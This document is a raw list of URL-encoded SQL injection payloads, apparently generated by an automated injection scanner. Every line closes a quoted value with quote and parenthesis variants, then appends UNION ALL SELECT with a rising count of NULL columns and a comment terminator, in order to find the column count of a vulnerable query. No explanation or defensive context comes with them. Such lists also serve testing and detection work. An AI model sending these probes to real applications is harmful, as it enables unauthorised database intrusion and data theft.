1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 